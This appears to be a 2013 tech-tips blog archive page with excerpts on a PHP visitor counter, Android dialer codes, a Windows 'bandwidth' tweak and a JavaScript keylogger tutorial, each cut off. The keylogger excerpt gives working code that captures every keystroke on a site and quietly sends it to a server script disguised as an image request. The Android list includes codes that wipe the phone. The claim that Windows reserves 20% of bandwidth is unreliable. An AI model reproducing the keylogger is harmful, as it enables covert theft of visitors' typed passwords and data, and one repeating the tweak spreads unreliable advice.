Posts

Showing posts from November, 2013

Your own php online counter for website

This is the script for online counter .It can be used in your website to display online visitors in your site. (use with your own css to have a better look) *How to make ? Step 1 ==> In your php site make a database. Note the username,password and the database name of the created database. Step 2 ==> Now create two files sql.sql and user_online.php in your site using ftp. Step 3 ==> Copy and paste below content to user_online.php <? /* JOIN US https://m.facebook.com/groups/427625107334527 Dedicated to Our New Member Arun Raj and Okechukwu Friday */ session_start(); $session=session_id(); $time=time(); $time_check=$time-600; //SET TIME 10 Minute $host="paste mysql server name here"; //My sql Host name obtained from the host $username="paste username of database"; // Mysql username $password="paste password of database"; // Mysql password $db_name="paste name of database"; // Database name $tbl_name=...

Most Useful Android Secret Codes To know

Image
For IMEI Number: *#06# For RAM Memory version: *#*#3264#*#* For FTA SW version: *#*#1111#*#* For FTA HW version: *#*#2222#*#* For Touchscreen version: *#*#2663#*#* To test Bluetooth: *#*#232331#*#* To display Bluetooth Physic Address: #*#232337#*# To test secret GPS: *#*#1472365#*#* To test other GPS:  *#*#1575#*#* To test WiFi/Wireless LAN of phone: *#*#232339#*#* or *#*#528#*#* or *#*#526#*#* To display Wi-Fi MAC Address: *#*#232338#*#* To test Vibration and Back-light of device: *#*#0842#*#* To test Proximity/Distance Sensor: *#*#0588#*#* To test Touchscreen: *#*#2663#*#* For Audio Test: *#*#0289#*#* or *#*#0673#*#* To launch Service Mode: *#*#197328640#*#* Hidden Service Menu (Motorola Droid): ##7764726 Field Test: *#*#7262626#*#* To format the phone: *2767*3855# To Restore Factory Settings: *#*#7780#*#* To create Immediate backup of your multimedia files: *#*#273282*255*663282*#*#* To display Phone Information: *#*#4636#*#* To get detailed Camera In...

Speed up your Internet by 20% on windows

Image
Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc You can get it back: Step-1: Click Start then Run and type "gpedit.msc" without quotes. This opens the 'group policy' editor. Step-2 : - go to: Local Computer Policy - Then Computer Configuration - Then Administrative Templates then Network then QOS Packet Scheduler   and then to Limit Reservable Bandwidth. Step-3: Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the ‘Explain‘ tab i.e."By default,the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default. Step-4: So the trick is to ENABLE reservable bandwidth (in setting teb), then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%. It works on Win 2000 as well. ...

Javascript keyLogger ( Full source code with explanation ) -Record every Key stroke in your website .

REQUIREMENTS 1. A website  with php support 2. A webbrowser STEP 1 : Creating a file code.js and uploading it to your site in any durectory ( Let the directory be dir ) The below code should be pasted inside code.js  var keys='';  // declaring a javascript variable to store each keystroke  document.onkeypress = function(e) // calling the function to execute whenever a keystroke is there on html document  document.onkeypress  is an event handler { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; //get character code  key = String.fromCharCode(key); // convert it to string  keys+=key; // append current character to previous one (concatinate) } window.setInterval(function(){ new Image().src = '/keylogger.php?c='+keys; // sending data as get request by creating a new image  keys = ''; }, 1000); // set interval to execute function continuously ...